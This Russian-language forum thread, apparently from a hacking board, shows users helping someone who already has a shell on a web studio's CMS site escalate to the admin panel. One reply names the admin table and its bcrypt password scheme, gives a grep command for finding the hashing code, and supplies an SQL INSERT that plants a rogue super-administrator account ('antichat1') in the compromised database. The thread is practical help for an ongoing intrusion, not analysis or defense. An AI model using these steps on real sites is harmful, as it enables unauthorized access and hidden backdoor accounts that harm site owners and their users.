|
В общем есть шелл на данном типе движка доступ к зарегистрированным пользователям. Но данные под панель администрирования не подходят. И собственно вопрос, где хранятся данные админ пользователей данного движка?
|
это просто студия, которая клепает сайты. http://argentum.ua/ru/portfolio
если нет в базе, значит лежат где-нибудь в файле |
Я встречал на многих сайтах, что данные админа как правило находились в скрипте панели администрирования.
Вот я зашёл сюда /.../cpanel http://s001.radikal.ru/i195/1506/90/f1e04b4c6e7a.jpg А дальше где искать, уже все тут конфиги перерыл. Народ, подскажите! P.S Данные db_user - не подходят! |
Цитата:
|
я сначала начал искать по файлам всяческими find и grep, а потом все же решил перепроверить.
есть там такая таблица: sf_admin_user, в ней такие колонки: Код:
id group_id username password full_name email created_at last_activity is_active is_super_adminпароли там через функцию http://php.net/manual/ru/function.password-hash.php ищем файл: Код:
grep --exclude=*.o -rnw '/var/www/***/' -e "PASSWORD_BCRYPT"PHP код:
генерируем пасс себе Код:
10,добавим себя в базу: Код:
INSERT INTO sf_admin_user (id, group_id, username, password, full_name, email, created_at, last_activity, is_active, is_super_admin) VALUES (667, 1, "antichat1", "$2a$10$Fnz2ze0gI7SYofxsluTrluK3GEQiFGS2Oy4kEbBo816yEvRWHFGKS", "lol1", "lol@lol.ru1", "2010-10-10 17:29:54", "2013-04-05 22:05:38", 1, 1); |
Что-то я не понял, я создал пхп-скрипт ввёл код.
Код:
10, |
Цитата:
|
| Время: 15:04 |